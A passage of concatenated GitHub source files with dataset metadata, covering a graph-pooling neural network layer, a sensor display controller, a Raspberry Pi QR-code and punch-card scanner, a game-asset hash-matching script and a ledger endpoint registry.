2D.\".format(a.shape)\n","repo_name":"roksikonja/tsipy","sub_path":"tests/utils.py","file_name":"utils.py","file_ext":"py","file_size_in_byte":2385,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"81"} +{"seq_id":"40614840837","text":"import torch\nfrom torch import nn as nn\n\n\"\"\"\n <Dense/Tensorzied version of the Diffpool layer>\n \n DIFFPOOL:\n Z. Ying, J. You, C. Morris, X. Ren, W. Hamilton, and J. Leskovec, \n Hierarchical graph representation learning with differentiable pooling (NeurIPS 2018)\n https://arxiv.org/pdf/1806.08804.pdf\n \n ! code started from dgl diffpool examples dir\n\"\"\"\n\nfrom .assignment_layer import DiffPoolAssignment\nfrom .dense_graphsage_layer import DenseGraphSage\n\n\nclass EntropyLoss(nn.Module):\n # Return Scalar\n # loss used in diffpool\n def forward(self, adj, anext, s_l):\n entropy = (torch.distributions.Categorical(\n probs=s_l).entropy()).sum(-1).mean(-1)\n assert not torch.isnan(entropy)\n return entropy\n\n\nclass LinkPredLoss(nn.Module):\n # loss used in diffpool\n def forward(self, adj, anext, s_l):\n link_pred_loss = (\n adj - s_l.matmul(s_l.transpose(-1, -2))).norm(dim=(1, 2))\n link_pred_loss = link_pred_loss / (adj.size(1) * adj.size(2))\n return link_pred_loss.mean()\n\n\nclass DenseDiffPool(nn.Module):\n def __init__(self, nfeat, nnext, nhid, link_pred=False, entropy=True):\n super().__init__()\n self.link_pred = link_pred\n self.log = {}\n self.link_pred_layer = self.LinkPredLoss()\n self.embed = DenseGraphSage(nfeat, nhid, use_bn=True)\n self.assign = DiffPoolAssignment(nfeat, nnext)\n self.reg_loss = nn.ModuleList([])\n self.loss_log = {}\n if link_pred:\n self.reg_loss.append(LinkPredLoss())\n if entropy:\n self.reg_loss.append(EntropyLoss())\n\n def forward(self, x, adj, log=False):\n z_l = self.embed(x, adj)\n s_l = self.assign(x, adj)\n if log:\n self.log['s'] = s_l.cpu().numpy()\n xnext = torch.matmul(s_l.transpose(-1, -2), z_l)\n anext = (s_l.transpose(-1, -2)).matmul(adj).matmul(s_l)\n\n for loss_layer in self.reg_loss:\n loss_name = str(type(loss_layer).__name__)\n self.loss_log[loss_name] = loss_layer(adj, anext, s_l)\n if log:\n self.log['a'] = anext.cpu().numpy()\n return xnext, anext\n\n","repo_name":"Shen-Lab/GraphCL","sub_path":"semisupervised_MNIST_CIFAR10/finetuning/layers/tensorized/dense_diffpool_layer.py","file_name":"dense_diffpool_layer.py","file_ext":"py","file_size_in_byte":2188,"program_lang":"python","lang":"en","doc_type":"code","stars":484,"dataset":"github-code","pt":"81"} +{"seq_id":"33676520978","text":"\"\"\"\nDisplay controller\nOutputs control characters for the display along with sensor data\n\nSetup needs to have measurements with the labels DO and TEMP\n\nBased on the 8210 basic program below:\n\n10 OPEN \"TERM:\" nowait\n15 If Err then goto 100\n20 Control 1\n30 Control 11,1200\n35 a = DO\n36 b = TEMP\n37 Print 14$;48$;49$;3$;68$;79$;13$;15$;48$;49$;3$;\n38 Sleep 2\n40 Print 14$;48$;49$;3$;a!3!2;13$;15$;48$;49$;3$;\n42 Sleep 15\n45 ' ON|addr|addr|etx|data stuff|CR|off|addr|addr|etx\n46 Print 14$;48$;49$;3$;84$;69$;77$;80$;13$;15$;48$;49$;3$;\n47 Sleep 2\n48 Print 14$;48$;49$;3$;b!3!2;13$;15$;48$;49$;3$;\n50 Close\n60 stop\n100 open \"DISPLAY:\" nowait\n105 Control 1\n110 Print \"TERM BUSY\"; : Sleep 2\n115 Control 2 : Close\n120 goto 10\n\n\nBased on the comments ON|addr|addr|etx|data stuff|CR|off|addr|addr|etx\n it appears we are writing to the same 'address' of the display\n First, we write the sensor name \"DO\", then we wait 2 sec\n Next, we write the actual sensor reading for \"DO\" (presumably dissolved oxygen), wait 15 sec\n After that, we write the sensor name \"TEMP\", and wait 2 sec\n Next, we write the actual sensor reading for temperature and wait 15 seconds\n\nPython does not print literals in decimal like basic. Python uses hex.\nSo, the literal values (e.g. '14$') were translated to hex ('\\x0E').\nTranslation table:\nON\n14$ = \\x0E\n\naddr\n48$ = \\x30\n49$ = \\x31\n\nETX\n3$ = \\x03\n\ndata stuff\n68$ = 'D'\n79$ = 'O'\n\n84$ = 'T'\n69$ = 'E'\n77$ = 'M'\n80$ = 'P'\n\nCR\n13$ = \\x0D\n\nOFF\n$15 = \\x0F`\n\"\"\"\n\nfrom sl3 import *\nimport serial\nimport utime\n\nstart_sequence = '\\x0E\\x30\\x31\\x03' # ON|addr|addr|etx\nend_sequence = '\\x0D\\x0F\\x30\\x31\\x03' # CR|off|addr|addr|etx\n\n\n@TASK\ndef display_SO2245():\n\n # get the sensor readings\n do_reading = measure(\"DO\").value\n temp_reading = measure(\"TEMP\").value\n\n with serial.Serial(\"RS232\", 1200) as output:\n # write 'DO'\n output.write(start_sequence)\n output.write('DO')\n output.write(end_sequence)\n utime.sleep(2)\n\n # write the value of the DO sensor\n output.write(start_sequence)\n output.write(\"{:.{}f}\".format(do_reading, 2)) # 2 is the number of right digits\n output.write(end_sequence)\n utime.sleep(15)\n\n # write 'TEMP'\n output.write(start_sequence)\n output.write('TEMP')\n output.write(end_sequence)\n utime.sleep(2)\n\n # write the value of the TEMP sensor\n output.write(start_sequence)\n output.write(\"{:.{}f}\".format(temp_reading, 2)) # 2 is the number of right digits\n output.write(end_sequence)\n utime.sleep(15)\n\n output.flush() # needed to make sure all the data is sent before closing the port.\n","repo_name":"mgsorokin/XLink500","sub_path":"projects/Display_SO2245/Display_SO2245.py","file_name":"Display_SO2245.py","file_ext":"py","file_size_in_byte":2704,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"81"} +{"seq_id":"31972104696","text":"import json\n\ndef classify_deployed(file_name, classes):\n payload = None\n with open(file_name, 'rb') as f:\n payload = f.read()\n payload = bytearray(payload)\n runtime_client = boto3.client('runtime.sagemaker')\n response = runtime_client.invoke_endpoint(EndpointName = \"image-classification-2020-12-14-00-17-31-761\",ContentType = 'application/x-image',Body = payload)\n result = json.loads(response['Body'].read())\n print(f\"Image is {classes[np.argmax(result)]}\")\n\nclassify_deployed(\"./pearl-5.jpg\",[\"mona-lisa\",\"pearl\"])","repo_name":"mariyamkhalid/cp-sagemaker-endpoint","sub_path":"test_endpoint.py","file_name":"test_endpoint.py","file_ext":"py","file_size_in_byte":549,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"81"} +{"seq_id":"18820850714","text":"from main.models import LinksModel\n\nnavbar_dict = {\n 'index': 'Home',\n 'bio_veles': 'Bio',\n 'media': 'Gallery',\n 'repertoire': 'Repertoire',\n 'contacts': 'Contacts',\n}\n\n\nclass LinksAndTitleMixin:\n def get_context_data(self, **kwargs):\n context = super().get_context_data(**kwargs)\n context['links'] = LinksModel.objects.all()\n context['navbar_dict'] = navbar_dict\n return context\n","repo_name":"PavelCyargeenka/duo_veles","sub_path":"duo_veles/utils.py","file_name":"utils.py","file_ext":"py","file_size_in_byte":426,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"81"} +{"seq_id":"1448688227","text":"#!/usr/bin/python3\n\n# reinstall\n# sudo apt install python3-opencv\n# pip3 install pyzbar\n# sudo apt install python-zbar\n# pip3 install imutils\n# pip3 install paho-mqtt\n# sudo apt install python3-picamera\n\nimport time\n\ntime_last_debug_picture_saved = 0\ntime_script_started = time.time() #to terminate script after some time to prevent possible hang up of hard or software\n\n\nimport cv2\nfrom pyzbar import pyzbar\nimport imutils\nfrom imutils.video import VideoStream\nimport paho.mqtt.publish as publish\nimport hashlib\nimport json\nimport argparse\nimport requests #pip3 install requests\nimport logging\nfrom pathlib import Path\nimport numpy as np\n\n\nlogging.basicConfig(format=\"%(asctime)-15s %(levelname)-8s %(message)s\")\nlogger = logging.getLogger(\"QR-Code Scanner\")\n\nparser = argparse.ArgumentParser()\nparser.add_argument(\"security_str\", help=\"A string to securely calculate the md5sum.\")\nparser.add_argument(\"-v\", \"--verbosity\", help=\"increase output verbosity\", default=0, action=\"count\")\nparser.add_argument(\"--no-pushover\", help=\"if set, not pushover messages will be send.\", action='store_true')\nargs = parser.parse_args()\nlogger.setLevel(logging.WARNING-(args.verbosity*10 if args.verbosity <=2 else 20) )\n\nlogger.info(\"Verbosity min. at info level.\")\n\n\n# floodfill like function\ndef find_components(arr):\n res = []\n dx,dy = [1,0,-1,0],[0,-1,0,1]\n N,M = arr.shape\n seen = np.zeros((N,M))\n for i in range(N):\n for j in range(M):\n if not seen[i][j] and arr[i][j]:\n todo=[(i,j)]\n seen[i][j] = 1\n cnt=0\n extreme_position = {'x':[i,i], 'y':[j,j]} #'x':min..max, 'y':min..max\n while todo:\n x,y = todo.pop()\n cnt = cnt+1\n for dX, dY in zip(dx,dy):\n X=x+dX\n Y=y+dY\n if X>=0 and X<N and Y>=0 and Y<M and not seen[X][Y] and arr[X][Y]:\n todo.append((X,Y))\n seen[X][Y] = 1\n if X>extreme_position['x'][1]: extreme_position['x'][1]=X\n if X<extreme_position['x'][0]: extreme_position['x'][0]=X\n if Y>extreme_position['y'][1]: extreme_position['y'][1]=Y\n if Y<extreme_position['y'][0]: extreme_position['y'][0]=Y\n res.append({'pos':(i,j),'N_pixels':cnt,'extreme_position':extreme_position,\n 'width':extreme_position['x'][1]-extreme_position['x'][0],\n 'height':extreme_position['y'][1]-extreme_position['y'][0]})\n return res\n\n\n##\nif not args.no_pushover:\n r = requests.post(\"https://api.pushover.net/1/messages.json\", data = {\n \"token\": \"...\", #APP key\n \"user\": \"uTGmV4oeANh23KMHAuwK3CHwupRRVK\",\n \"message\": 'Die Software wurde gerade neugestartet.',\n \"priority\": 1,\n \"title\": \"Neustart\"\n })\n logger.info(r.text)\n logger.info(\"data send to pushover\")\n\n##\n\n# initialize video stream\nvideo_width = 1920\nvideo_height = 1440\npage_width=148 #*mm #final page after cut\npage_height=148 #*mm #final page after cut\nqr_code_size = 60 #*mm\n\nvs = VideoStream(usePiCamera = True, resolution=(video_width, video_height) ).start()\nlogger.debug(\"wait for camera to adapt\")\ntime.sleep(5)\nlast_frame = vs.read()\n\nlogger.info(\"Script completed initialisation.\")\n#while (time.time() - time_script_started < 60*60*24): #terminate after 24 hours of runtime\ncontinue_loop = True\nwhile continue_loop:\n #oben weiß\n publish.single(\"homie/qrscanner/message\", \"Lege die Laufkarte ein.\", hostname=\"localhost\")\n publish.single(\"homie/qrscanner/light\", json.dumps( [[255,255,255]]*15 + [[0,0,0]]*15 ), hostname=\"localhost\")\n time.sleep(0.5) #spend soem time to make the CPU not heating up too much\n\n # read from camera\n frame = vs.read()\n logger.debug(\"picture taken\")\n loop_diff_test = cv2.subtract(frame, last_frame)\n result = not np.any(loop_diff_test)\n if result is True:\n logger.error(\"picture comparision shows: picture is NOT different comparend to last loop. This means, our camera connection is broken. Terminating.\")\n continue_loop = False\n else:\n logger.debug(\"picture comparision shows: picture is different comparend to last loop. Good, our camera is still alive.\")\n last_frame = frame.copy()\n\n # read from a debug file for test purposes only\n# frame = cv2.imread('/home/pi/Pictures/card_0.png', 0) #0 converts it to greyscale\n\n # for better performance, resize the image\n# frame = imutils.resize(frame, width=1200)\n frame_small = imutils.resize(frame, width=540)\n frame_gray = cv2.cvtColor(frame_small, cv2.COLOR_BGR2GRAY)\n if (time.time() - time_last_debug_picture_saved >= 10):\n cv2.imwrite(\"/dev/shm/time_{}.png\".format(round(time.time())), frame_small) #for debug reasons\n time_last_debug_picture_saved = time.time()\n logger.info(\"debug picture saved\")\n\n logger.debug(\"start searching for qr-codes\")\n barcodes = pyzbar.decode(frame_gray)\n\n for barcode in barcodes: #for each barcode found\n cv2.imwrite(\"/home/pi/Pictures/time_{}.png\".format(round(time.time())), frame) #for debugging\n publish.single(\"homie/qrscanner/message\", \"QR-Code gefunden.\", hostname=\"localhost\")\n publish.single(\"homie/qrscanner/sound\", \"qrcodefound.mp3\", hostname=\"localhost\")\n\n barcode_rel_x_pos = (barcode.rect.left+barcode.rect.width/2) / 540\n barcode_rel_y_pos = (barcode.rect.top+barcode.rect.height/2) / (540/video_width*video_height)\n logger.debug(\"QR-Code at position: {:.3f} {:.3f}\".format(barcode_rel_x_pos, barcode_rel_y_pos))\n\n #ideal position at: 0.509 0.459\n if ( ( abs(barcode_rel_x_pos-0.51) > 0.1 ) or ( abs(barcode_rel_y_pos-0.459) > 0.05) ):\n #does not lie in the center, animation towards te center\n publish.single(\"homie/qrscanner/message\", \"Schiebe die Karte in die Mitte des Fachs.\", hostname=\"localhost\")\n publish.single(\"homie/qrscanner/sound\", \"pushtocenter.mp3\", hostname=\"localhost\")\n\n for i in range(3):\n publish.single(\"homie/qrscanner/light\", json.dumps( [[255,255,0]]*15 + [[255,255,0]]*15 ), hostname=\"localhost\")\n time.sleep(0.2)\n publish.single(\"homie/qrscanner/light\", json.dumps( [[0,0,0]]*30 ), hostname=\"localhost\")\n time.sleep(0.2)\n\n else: #lies in the middle/center\n publish.single(\"homie/qrscanner/message\", \"Die Karte liegt richtig.\", hostname=\"localhost\")\n\n d = None\n try:\n d = json.loads(barcode.data.decode(\"utf-8\"))\n except:\n logger.warning(\"ERROR: QR-Code does not contain a valid JSON string.\")\n\n if 'count' in d:\n expected_sum = hashlib.md5(\"{}{}\".format(args.security_str, d['count']).encode('utf-8')).hexdigest()\n if expected_sum == d['hash']:\n logger.info(\"Valid QR-Code for nr: {}\".format(d['count']))\n\n card_data = {'status': 0, 'time_lastseen': 0}\n\n my_filename = '/home/pi/cards/{}.json'.format(d['count'])\n my_file = Path(my_filename)\n if my_file.exists():\n logger.info(\"card info file already existing. attempt to read it.\")\n with open(my_filename,'r') as r:\n try:\n card_data = json.load(r)\n logger.info(\"card info successfully read from file.\")\n except:\n logger.warning(\"error while reading the card file\")\n\n if card_data['status'] == 1:\n publish.single(\"homie/qrscanner/message\", \"Die Laufkarte wurde bereits eingelöst.\", hostname=\"localhost\")\n publish.single(\"homie/qrscanner/sound\", \"cardnotvalid.mp3\", hostname=\"localhost\")\n logger.warning(\"according to card info, this card is not valid any longer for redeem. Waitung for 1 seconds.\")\n for i in range(3):\n publish.single(\"homie/qrscanner/light\", json.dumps( [[255,0,0]]*30 ), hostname=\"localhost\")\n time.sleep(.2)\n publish.single(\"homie/qrscanner/light\", json.dumps( [[255,255,0]]*30 ), hostname=\"localhost\")\n time.sleep(.2)\n publish.single(\"homie/qrscanner/light\", json.dumps( [[255,0,0]]*30 ), hostname=\"localhost\")\n time.sleep(1)\n\n else:\n cv2.imwrite(\"/home/pi/Pictures/card_top_{}.png\".format(d['count']), frame) # for later analysis\n\n publish.single(\"homie/qrscanner/message\", \"2. Bild mit den Stanzungen machen...\", hostname=\"localhost\")\n\n #prepare picture\n publish.single(\"homie/qrscanner/light\", json.dumps( [[0,255,0]]*15 + [[255,0,0]]*15 ), hostname=\"localhost\")\n time.sleep(1) #spend some time to let the camera adapt\n frame_bottom = vs.read() #take a picture\n logger.debug(\"2nd picture taken with additional light from bottom\")\n cv2.imwrite(\"/home/pi/Pictures/card_bottom_{}.png\".format(d['count']), frame_bottom) # for later analysis\n\n frame_bottom_small = imutils.resize(frame_bottom, width=540)\n\n publish.single(\"homie/qrscanner/message\", \"Stanzungen werden überprüft...\", hostname=\"localhost\")\n\n #begin analysis\n logger.info(\"Barcode read: {}\".format(barcode))\n\n barcode_rel_x_pos = (barcode.rect.left+barcode.rect.width/2) / video_width\n barcode_rel_y_pos = (barcode.rect.top+barcode.rect.height/2) / video_height\n\n img = frame_bottom_small\n rows,cols,ch = img.shape\n\n scale_factor = 540/4*3/page_width #540 = width of image, 4/3 aspect ratio of image\n margin = 0\n pts1 = np.float32(barcode.polygon)\n pts2 = np.float32([\n [(page_width/2-qr_code_size/2)*scale_factor+margin, (page_width/2-qr_code_size/2+margin)*scale_factor],\n [(page_width/2-qr_code_size/2)*scale_factor+margin, (page_width/2+qr_code_size/2-margin)*scale_factor],\n [(page_width/2+qr_code_size/2)*scale_factor-margin, (page_width/2+qr_code_size/2-margin)*scale_factor],\n [(page_width/2+qr_code_size/2)*scale_factor-margin, (page_width/2-qr_code_size/2+margin)*scale_factor]\n ])\n\n M = cv2.getPerspectiveTransform(pts1,pts2)\n\n dst = cv2.warpPerspective(img,M,(405,405))\n dst_top = cv2.warpPerspective(frame_small,M,(405,405))\n \n red = dst.copy()\n # set green and blue channels to 0\n red[:, :, 0] = 0\n red[:, :, 1] = 0\n\n green = dst.copy()\n # set red and blue channels to 0\n green[:, :, 0] = 0\n green[:, :, 2] = 0\n\n # compute difference: red-green\n green_to_red = green.copy()\n #shift the green part into the red channel\n green_to_red[:, :, 2] = green_to_red[:, :, 1]\n difference = cv2.subtract(red, green_to_red)\n\n\n #check the light from behind in the region of the qr code:\n # to determine the threshold for the Binary conversion, read \n # the threshold from the center part of the image and the total\n # center part:\n cv2.imwrite(\"/dev/shm/last_warp_red_mask.png\",red[120:300, 120:300])\n hist = cv2.calcHist([difference[120:300, 120:300]], [2], None, [256], [0,256])\n my_thres = 255\n for i in range(256):\n if hist[255-i] < 1: #below some small arbitrary threshold\n my_thres = 255-i\n\n #total image:\n hist_all = cv2.calcHist([difference], [2], None, [256], [0,256])\n my_thres_all = my_thres\n for i in range(my_thres, 256):\n if hist_all[i] > 0: #above some small arbitrary threshold\n my_thres_all = i\n my_thres_all = 100 if my_thres_all < 100 else my_thres_all\n logger.debug(\"mythres: {}, mythres_all: {}\".format(my_thres, my_thres_all))\n\n red_dst = difference[:, :, 2].copy() #convert into single color image do not use cvtColor as it lower intensity on reds: #cv2.cvtColor(red, cv2.COLOR_BGR2GRAY); #convert to gray\n # put threshold between my_thres and my_thres_all\n ret3,th3 = cv2.threshold(red_dst,my_thres + (my_thres_all-my_thres)/2,255,cv2.THRESH_BINARY) #cut out the light which still goes through the middle of the card\n th3 [80:320,80:320] = 0 #set the inner part to black\n\n\n dst_masked = dst.copy()\n dst_masked[th3 != 255] = [0,0,0]\n dst_top[th3 == 255] = [0,0,255]\n\n #end of analysis\n\n stamps = find_components(th3)\n number_stamps = 0\n for i in stamps:\n if i['N_pixels'] > 100 and i['N_pixels'] < 1500 and \\\n i['width'] > 10 and i['width'] < 60 and \\\n i['height'] > 10 and i['height'] < 60:\n number_stamps +=1\n logger.info(\"Stamp found: {}\".format(i) )\n else:\n logger.debug(\"Stamp does not match requirements: {}\".format(i) )\n if number_stamps>12: number_stamps=12\n\n v_img = cv2.vconcat([frame_small[0:405 , 0:405], dst_masked])\n cv2.imwrite(\"/dev/shm/last_combined.png\", v_img) #will also be usede for pushover\n\n v_img = cv2.vconcat([\n cv2.hconcat([frame_small[0:405 , 0:405], dst, red, difference]),\n cv2.hconcat([frame_bottom_small[0:405 , 0:405], green, dst_masked, dst_top])])\n cv2.imwrite(\"/dev/shm/last_combined_overview.png\", v_img)\n\n\n\n\n if number_stamps>0:\n card_data['status'] = 1 # set card to be not valid any longer\n publish.single(\"homie/qrscanner/valid\", d['count'], hostname=\"localhost\")\n publish.single(\"homie/qrscanner/message\", \"Laufkarte gültig. Ausgabe!\", hostname=\"localhost\")\n publish.single(\"homie/qrscanner/sound\", \"redeem.mp3\", hostname=\"localhost\")\n\n if not args.no_pushover:\n r = requests.post(\"https://api.pushover.net/1/messages.json\", data = {\n \"token\": \"...\", #APP key\n \"user\": \"uTGmV4oeANh23KMHAuwK3CHwupRRVK\",\n \"message\": '''<p>Gültiger QR-Code-Scan</p>\n <p>count: {}</p>\n <a href=\"https://www.eue-turnt.de/schild/PushoverFeedback.php?count={}&hash={}\">Erlauben? Dann hier drücken.</a>'''.format(d['count'], d['count'], d['hash']),\n \"priority\": 2,\n \"html\": 1,\n \"expire\": 60,\n \"retry\": 30,\n \"sound\": \"persistent\",\n \"title\": \"Neue Laufkarte\"\n },\n files = {\n \"attachment\": (\"last_combined_overview.png\", open(\"/dev/shm/last_combined_overview.png\", \"rb\"), \"image/png\")\n })\n logger.info(r.text)\n logger.info(\"data send to pushover\")\n\n for i in range(5):\n publish.single(\"homie/qrscanner/light\", json.dumps( [[0,255,0]]*30 ), hostname=\"localhost\")\n time.sleep(0.2)\n publish.single(\"homie/qrscanner/light\", json.dumps( [[0,0,0]]*30 ), hostname=\"localhost\")\n time.sleep(0.2)\n logger.info(\"Grünes Licht eingeschaltet. Jetzt Ausgabe.\")\n publish.single(\"homie/qrscanner/light\", json.dumps( [[0,255,0]]*30 ), hostname=\"localhost\")\n time.sleep(1.0)\n else:\n logger.info(\"Rotes Blink-Licht wird eingeschaltet, da keine Stanzungen gefunden.\")\n publish.single(\"homie/qrscanner/message\", \"Keine Stanzungen gefunden. Fehler? Schreibe uns!\", hostname=\"localhost\")\n publish.single(\"homie/qrscanner/sound\", \"nostampsfound.mp3\", hostname=\"localhost\")\n for i in range(3):\n publish.single(\"homie/qrscanner/light\", json.dumps( [[255,0,0]]*30 ), hostname=\"localhost\")\n time.sleep(.2)\n publish.single(\"homie/qrscanner/light\", json.dumps( [[0,0,0]]*30 ), hostname=\"localhost\")\n time.sleep(.2)\n publish.single(\"homie/qrscanner/light\", json.dumps( [[255,0,0]]*30 ), hostname=\"localhost\")\n time.sleep(1)\n\n\n card_data['time_lastseen'] = time.time()\n with open(my_filename, 'w') as outfile:\n json.dump(card_data, outfile)\n logger.info(\"card info written to file: {}\".format(my_filename))\n\n time.sleep(2.0)\n else:\n logger.info(\"Invalid data scanned: {}\".format( barcode.data.decode(\"utf-8\") ))\n publish.single(\"homie/qrscanner/message\", \"Ungültiger QR-Code auf Laufkarte.\", hostname=\"localhost\")\n\n\n\ncv2.destroyAllWindows()\nvs.stop()\n\nlogger.info(\"Script terminated. Total runtime: {:.2f} min\".format( (time.time()-time_script_started)/60 ) )\n\n","repo_name":"pbotte/eue-turnt","sub_path":"automat-v2/qr-scanner.py","file_name":"qr-scanner.py","file_ext":"py","file_size_in_byte":16674,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"81"} +{"seq_id":"19353855380","text":"import json\nfrom common import ioi_hash\nimport argparse\n\n# This script isn't the best way to do this, but it works.\n# It would have been better to check which LOCRs had paths and then check if they had any LINE dependencies.\n# But I have no way of doing that in this repository.\n\nparser = argparse.ArgumentParser(description=\"Bruteforce LINE paths\")\nparser.add_argument('-o', '--output', type=str, default=\"new_line_paths.txt\", help=\"Output file name. Defaults to new_line_paths.txt.\")\nargs = parser.parse_args()\n\nwith open(\"paths\\\\LOCR.json\", \"r\") as f:\n locr_data = json.load(f)\n\nwith open(\"paths\\\\LINE.json\", \"r\") as f:\n line_data = json.load(f)\n\nfound = []\n\nfor locr_entry in locr_data:\n locr_base_path = locr_entry[\"path\"].rsplit('].', 1)[0]\n\n for line_entry in line_data:\n if \"hint\" in line_entry and line_entry[\"path\"] == \"\":\n line_path = f\"{locr_base_path}?/{line_entry['hint']}.sweetline].pc_sweetline\"\n line_path_old_style = f\"{locr_base_path}?{line_entry['hint']}.sweetline].pc_sweetline\"\n\n if ioi_hash(line_path) == line_entry[\"hash\"]:\n found.append(f\"{line_entry['hash']}.LINE,{line_path}\")\n elif ioi_hash(line_path_old_style) == line_entry[\"hash\"]:\n found.append(f\"{line_entry['hash']}.LINE,{line_path_old_style}\")\n\nwith open(args.output, \"w\") as f:\n for item in found:\n f.write(f\"{item}\\n\")\n","repo_name":"glacier-modding/Hitman-Hashes","sub_path":"scripts/bruteforce_line_paths.py","file_name":"bruteforce_line_paths.py","file_ext":"py","file_size_in_byte":1409,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"81"} +{"seq_id":"23800223636","text":"import logging\n\nfrom journal import transaction, global_store_manager\nfrom journal.messages import transaction_message\n\nlogger = logging.getLogger(__name__)\n\n\ndef register_transaction_types(ledger):\n \"\"\"Registers the endpoint registry asset types on the ledger.\n\n Args:\n ledger (journal.journal_core.Journal): The ledger to register\n the transaction type against.\n \"\"\"\n ledger.register_message_handler(\n EndpointRegistryTransactionMessage,\n transaction_message.transaction_message_handler)\n ledger.add_transaction_store(EndpointRegistryTransaction)\n\n\nclass EndpointRegistryTransactionMessage(\n transaction_message.TransactionMessage):\n \"\"\"Endpoint registry transaction messages represent endpoint registry\n transactions.\n\n Attributes:\n MessageType (str): The class name of the message.\n Transaction (EndpointRegistryTransaction): The transaction the\n message is associated with.\n \"\"\"\n MessageType = \"/ledger.transaction.EndpointRegistry/Transaction\"\n\n def __init__(self, minfo={}):\n super(EndpointRegistryTransactionMessage, self).__init__(minfo)\n\n tinfo = minfo.get('Transaction', {})\n self.Transaction = EndpointRegistryTransaction(tinfo)\n\n\nclass Update(object):\n \"\"\"Updates represent potential changes to the endpoint registry.\n\n Attributes:\n KnownVerbs (list): A list of possible update actions.\n Verb (str): The action of this update, defaults to 'reg'.\n Domain (str): The domain of the endpoint.\n Name (str): The name of the endpoint.\n NodeIdentifier (str): The identifier of the endpoint.\n NetHost (str): The hostname or IP address of the endpoint.\n NetPort (int): The port number of the endpoint.\n \"\"\"\n KnownVerbs = ['reg', 'unr']\n\n @staticmethod\n def create_from_node(node, domain='/'):\n \"\"\"Creates a new Update object based on the attributes of a\n node.\n\n Args:\n node (Node): The node to create an endpoint registry update\n object based on.\n domain (str): The domain of the endpoint.\n\n Returns:\n Update: An update object for registering the node's details.\n \"\"\"\n update = Update()\n\n update.Verb = 'reg'\n update.Domain = domain\n update.Name = node.Name\n update.NodeIdentifier = node.Identifier\n update.NetHost = node.NetHost\n update.NetPort = node.NetPort\n\n return update\n\n def __init__(self, minfo={}):\n \"\"\"Constructor for Update class.\n\n Args:\n minfo (dict): Dictionary of values for update fields.\n \"\"\"\n self.Verb = minfo.get('Verb', 'reg')\n\n self.Domain = minfo.get('Domain', '/')\n self.Name = minfo.get('Name', 'unknown')\n self.NodeIdentifier = minfo.get('NodeIdentifier', '')\n self.NetHost = minfo.get('NetHost', '0.0.0.0')\n self.NetPort = minfo.get('NetPort', 0)\n\n def __str__(self):\n return \"({0} {1} {2} {3} {4}:{5})\".format(\n self.Verb, self.NodeIdentifier, self.Name, self.Domain,\n self.NetHost, self.NetPort)\n\n def is_valid(self, store, originatorid):\n \"\"\"Determines if the update is valid.\n\n Args:\n store (dict): Transaction store mapping.\n originatorid (str): Node identifier of transaction originator.\n \"\"\"\n logger.debug('check update %s from %s', str(self), originatorid)\n\n # if the asset exists then the node must be the same as the transaction\n # originator\n if (self.NodeIdentifier in store\n and self.NodeIdentifier != originatorid):\n return False\n\n # check for an attempt to change owner of a non-existant asset\n if self.Verb == 'unr' and self.NodeIdentifier not in store:\n return False\n\n return True\n\n def apply(self, store):\n \"\"\"Applies the update to the asset in the transaction store.\n\n Args:\n store (dict): Transaction store mapping.\n \"\"\"\n logger.debug('apply %s', str(self))\n\n if self.Verb == 'reg':\n store[self.NodeIdentifier] = {\n 'Name': self.Name,\n 'Domain': self.Domain,\n 'NodeIdentifier': self.NodeIdentifier,\n 'Host': self.NetHost,\n 'Port': self.NetPort\n }\n elif self.Verb == 'unr':\n del store[self.NodeIdentifier]\n else:\n logger.info('unknown verb %s', self.Verb)\n\n def dump(self):\n \"\"\"Returns a dict with attributes from the update object.\n\n Returns:\n dict: A dictionary containing attributes from the update\n object.\n \"\"\"\n result = {\n 'Verb': self.Verb,\n 'Domain': self.Domain,\n 'Name': self.Name,\n 'NodeIdentifier': self.NodeIdentifier,\n 'NetHost': self.NetHost,\n 'NetPort': self.NetPort\n }\n return result\n\n\nclass EndpointRegistryTransaction(transaction.Transaction):\n \"\"\"A Transaction is a set of updates to be applied atomically\n to a ledger.\n\n It has a unique identifier and a signature to validate the source.\n\n Attributes:\n TransactionTypeName (str): The name of the endpoint registry\n transaction type.\n TransactionStoreType (type): The type of the transaction store.\n MessageType (type): The object type of the message associated\n with this transaction.\n Updates (list): A list of endpoint registry updates associated\n with this transaction.\n \"\"\"\n TransactionTypeName = '/EndpointRegistryTransaction'\n TransactionStoreType = global_store_manager.KeyValueStore\n MessageType = EndpointRegistryTransactionMessage\n\n @staticmethod\n def create_from_node(node, domain='/'):\n \"\"\"Creates a new EndpointRegistryTransaction object based on\n the attributes of a node.\n\n Args:\n node (Node): The node to create an endpoint registry update\n object based on.\n domain (str): The domain of the endpoint.\n\n Returns:\n Update: A transaction contiaining an update for\n registering the node's details.\n \"\"\"\n regtxn = EndpointRegistryTransaction()\n regtxn.Updates.append(Update.create_from_node(node, domain))\n\n return regtxn\n\n def __init__(self, minfo={}):\n super(EndpointRegistryTransaction, self).__init__(minfo)\n\n self.Updates = []\n\n if 'Updates' in minfo:\n for update in minfo['Updates']:\n self.Updates.append(Update(update))\n\n def __str__(self):\n return \" and \".join([str(u) for u in self.Updates])\n\n def is_valid(self, store):\n \"\"\"Determines if the transaction is valid.\n\n Args:\n store (dict): Transaction store mapping.\n\n Returns:\n bool: Whether or not the transaction is valid.\n \"\"\"\n if not super(EndpointRegistryTransaction, self).is_valid(store):\n return False\n\n for update in self.Updates:\n if not update.is_valid(store, self.OriginatorID):\n logger.debug('invalid transaction: %s', str(update))\n return False\n\n return True\n\n def apply(self, store):\n \"\"\"Applies all the updates in the transaction to the endpoint\n in the transaction store.\n\n Args:\n store (dict): Transaction store mapping.\n \"\"\"\n for update in self.Updates:\n update.apply(store)\n\n def dump(self):\n \"\"\"Returns a dict with attributes from the transaction object.\n\n Returns:\n dict: The updates from the transaction object.\n \"\"\"\n result = super(EndpointRegistryTransaction, self).dump()\n\n result['Updates'] = []\n for update in self.Updates:\n result['Updates'].append(update.dump())\n\n return 